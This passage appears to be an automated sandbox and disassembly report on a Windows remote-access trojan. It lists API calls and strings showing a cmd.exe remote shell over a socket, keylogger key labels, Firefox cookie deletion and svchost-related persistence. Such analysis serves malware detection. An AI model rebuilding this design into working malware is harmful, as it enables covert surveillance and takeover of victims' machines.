                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670), ref: 00402C48
                                                  • Part of subcall function 00401F9B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401FA9
                                                  • Part of subcall function 00402022: connect.WS2_32(00419D80,00419D84,00000010), ref: 00402038
                                                • Sleep.KERNEL32(0000012C,00000093), ref: 00402C94
                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402CBA
                                                • malloc.MSVCRT ref: 00402CCC
                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00402CE4
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402CFE
                                                • strncmp.MSVCRT ref: 00402D06
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402D1B
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?), ref: 00402D38
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402D5E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?), ref: 00402D75
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000062), ref: 00402D8A
                                                • free.MSVCRT ref: 00402D91
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 00402DA8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402C7A
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000062), ref: 00402DCE
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413760), ref: 00402DDF
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(004197D8), ref: 00402DED
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 00402DFA
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402E03
                                                • WriteFile.KERNEL32(00000000), ref: 00402E10
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670), ref: 00402E1D
                                                • Sleep.KERNEL32(00000064), ref: 00402E2A
                                                • TerminateProcess.KERNEL32(00000000), ref: 00402E44
                                                • CloseHandle.KERNEL32 ref: 00402E56
                                                • CloseHandle.KERNEL32 ref: 00402E5E
                                                • CloseHandle.KERNEL32 ref: 00402E75
                                                • CloseHandle.KERNEL32 ref: 00402E7D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402E8B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402E94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@$D@1@@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseHandle$CreatePipeV01@@$?length@?$basic_string@FileProcessSleepY?$basic_string@$??8std@@D@2@@0@NamedPeekReadTerminateV?$basic_string@Writeconnectfreegetenvmallocstrncmp
                                                • String ID: SystemDrive$cmd.exe
                                                • API String ID: 1882443052-3633465311
                                                • Opcode ID: 6bab4c7e2921adda392d72680d16ef73710547b042474502f1d0d8407c195bbc
                                                • Instruction ID: 419da016fc5bb814188602baed2b1322ca4077e3af0b71fca30b1c0fed1acb18
                                                • Opcode Fuzzy Hash: 6bab4c7e2921adda392d72680d16ef73710547b042474502f1d0d8407c195bbc
                                                • Instruction Fuzzy Hash: 9FB18F71A10205EBDB01AF61DD5DAEE7FB9EF05752F04803AE411A22E0CBB94E45CB9D
                                                APIs
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004106C8
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(004137F0,?), ref: 004106E1
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00419298), ref: 004106F7
                                                • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,?,00000000,?,00410184,?), ref: 00410727
                                                • GetLastError.KERNEL32 ref: 00410731
                                                • malloc.MSVCRT ref: 00410747
                                                • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,00000000,?,?,00410184,?), ref: 00410766
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00414B94,?), ref: 0041078A
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00410798
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004107A4
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004107AD
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004107B9
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00414B94,?), ref: 004107CA
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004107D7
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004107E3
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004107EC
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004107F8
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00414B94,?), ref: 00410809
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@$??1?$basic_string@$EnumG@2@@0@Hstd@@ServicesStatusV01@V01@@V10@@V?$basic_string@Y?$basic_string@$ErrorLastManagerOpenmalloc
                                                • String ID:
                                                • API String ID: 2829549728-0
                                                • Opcode ID: 2fa0e530b149dcad9d110a188135399984b8e95bcd493c4d583faa46f0272b87
                                                • Instruction ID: e18bbbac05a6e350111e28d5ab5c859b0810997aa56c281f851eeba24b99bb46
                                                • Opcode Fuzzy Hash: 2fa0e530b149dcad9d110a188135399984b8e95bcd493c4d583faa46f0272b87
                                                • Instruction Fuzzy Hash: 06A1BC71800119AFCF15EF90EC59EEEBB78FB18305F1081A9F516A2164EB745B89CF58
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,75920F00,00000000), ref: 00406932
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040693F
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,?), ref: 00406951
                                                • getenv.MSVCRT ref: 0040695D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00406969
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00406975
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040697E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406987
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00413A34,?), ref: 004069A1
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 004069AB
                                                • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 004069B2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004069BE
                                                • FindClose.KERNEL32(000000FF,?,?,?), ref: 004069CC
                                                • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 004069F1
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 00406A92
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00406A9F
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406AAB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406AB4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406ABD
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406AC6
                                                • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406ACD
                                                • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406AD7
                                                • FindNextFileA.KERNEL32(000000FF,00000010,?,?,?), ref: 00406AEB
                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406AF9
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],?,?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406B10
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040486A
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040487D
                                                  • Part of subcall function 00404857: SetEvent.KERNEL32(00000000,?,00406CE6), ref: 00404886
                                                  • Part of subcall function 00404857: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,00406CE6), ref: 00404895
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406B25
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406B2E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$Find$??0?$basic_string@D@1@@D@2@@0@FileHstd@@V01@V01@@V?$basic_string@$V10@$??4?$basic_string@?c_str@?$basic_string@CloseNextY?$basic_string@$DeleteErrorEventFirstLastV10@@getenv
                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\=A$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                • API String ID: 830200565-3920034925
                                                • Opcode ID: 776b2be4da0d4257667772fd5be241781957cc5658d04cd6243fbc1dd53b00f1
                                                • Instruction ID: 783fcf7c0b86e27e6131c177fc7404f8b43a340b055d1e10257517d2a055a55a
                                                • Opcode Fuzzy Hash: 776b2be4da0d4257667772fd5be241781957cc5658d04cd6243fbc1dd53b00f1
                                                • Instruction Fuzzy Hash: 9E615371900109ABCF00BFA0DC599EE7B78EF16306F0481B6E553F3190EA399A99CB58
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403F62
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76322A40), ref: 00403F72
                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00403F7C
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00403F86
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00413894,?), ref: 00403FA9
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00403FB3
                                                • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00403FBA
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00403FC6
                                                • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00403FE0
                                                • wcscmp.MSVCRT ref: 0040400D
                                                • wcscmp.MSVCRT ref: 00404025
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 0040403D
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 0040404F
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 0040405C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040406A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404073
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404082
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404091
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004040A1
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404198
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004041A1
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004041AA
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004041B3
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 004040B5
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76322A40,?,?,?), ref: 004040BF
                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 004040C9
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 004040D3
                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 004040EB
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404112
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040411C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404125
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00419288,?), ref: 0040414F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404159
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404174
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040417D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040418A
                                                • FindClose.KERNEL32(000000FF,?,?,?), ref: 004041C0
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004041C9
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004041D2
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004041DB
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$??0?$basic_string@$Hstd@@V?$basic_string@$?begin@?$basic_string@$FindG@2@@0@V01@@V10@0@$?end@?$basic_string@D@1@@D@2@@0@FileG@1@@V10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstNextV01@V12@
                                                • String ID:
                                                • API String ID: 1504175218-0
                                                • Opcode ID: 1ba8b113bf0700534af131f4cc335293d798d7936cc6f93eaf08f4156770f41e
                                                • Instruction ID: 444a803302a1e0bee7a230f5f554ee64eaaf2269fd5fb643ddbdb103b48501e0
                                                • Opcode Fuzzy Hash: 1ba8b113bf0700534af131f4cc335293d798d7936cc6f93eaf08f4156770f41e
                                                • Instruction Fuzzy Hash: 8071BE7290010AAFCF04EFA0EC59DEE7B7CAF14316F14816AF516A21A0EF749759CB58
                                                APIs
                                                • GetCurrentProcessId.KERNEL32 ref: 00409B56
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041457C,00000000), ref: 00409B69
                                                  • Part of subcall function 0040AB86: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040AB93
                                                  • Part of subcall function 0040AB86: RegSetValueExA.ADVAPI32(00000004,00000000,00000000,00000004,?,00000004,00000000,?,0040935F,80000001,00000000), ref: 0040ABAE
                                                  • Part of subcall function 0040AB86: RegCloseKey.ADVAPI32(?,?,0040935F,80000001,00000000), ref: 0040ABB9
                                                • OpenMutexA.KERNEL32(00100000,00000000), ref: 00409B97
                                                • CloseHandle.KERNEL32(00000000), ref: 00409BA3
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,?), ref: 00409BB5
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00409BD3
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH), ref: 00409BE1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ?c_str@?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$CloseOpenProcess$CreateCurrentHandleMutexValue
                                                • String ID: WDH$WinDir$\SysWOW64$\svchost.exe$\system32
                                                • API String ID: 1328014081-723382136
                                                • Opcode ID: 355c978dcdeee43627a75c0862c9d341e1a52c63927369a35f245de303cddc4e
                                                • Instruction ID: 8e48412dd88898db2cba31deebed8709c06bc6343ba3e07b923980143f207dbd
                                                • Opcode Fuzzy Hash: 355c978dcdeee43627a75c0862c9d341e1a52c63927369a35f245de303cddc4e
                                                • Instruction Fuzzy Hash: 7D512172940109BFDB05AF90EC59EEE7B78EF18306F044076F502A21A1DF795A4ACB6D
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [F7] ,?,00000001,?,75A8C0D0,?), ref: 004054A2
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413994,?), ref: 00405A2C
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413974,?,?,?,?,00000001), ref: 00405B7E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                                • String ID: [BckSp] $ [Del] $ [Down] $ [End] $ [Enter] $ [Esc] $ [F10] $ [F11] $ [F12] $ [F1] $ [F2] $ [F3] $ [F4] $ [F5] $ [F6] $ [F7] $ [F8] $ [F9] $ [Left] $ [PagDw] $ [PagUp] $ [Pause] $ [Print] $ [Right] $ [Start] $ [Tab] $ [Up] $4:A$?F@
                                                • API String ID: 4257247948-2284782974
                                                • Opcode ID: df4268028e8cfb44b5a47f789470c90612686643210732c79c93e9ce552e92e9
                                                • Instruction ID: 3f19922d5db0b4e0d37d61c04f39453babe7b1b0fadf195898c3e5135ea59910
                                                • Opcode Fuzzy Hash: df4268028e8cfb44b5a47f789470c90612686643210732c79c93e9ce552e92e9
                                                • Instruction Fuzzy Hash: C53293B2704809BFDB04B9EC8997DFF7A3DD640351B5009ABE803B61C1E9785E445EAB
                                                APIs
                                                • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,00419970,00419BC8,00000000,004086EB,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040901B
                                                • GetProcAddress.KERNEL32(00000000), ref: 00409024
                                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040903F
                                                • GetProcAddress.KERNEL32(00000000), ref: 00409042
                                                • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00409053
                                                • GetProcAddress.KERNEL32(00000000), ref: 00409056
                                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00409070
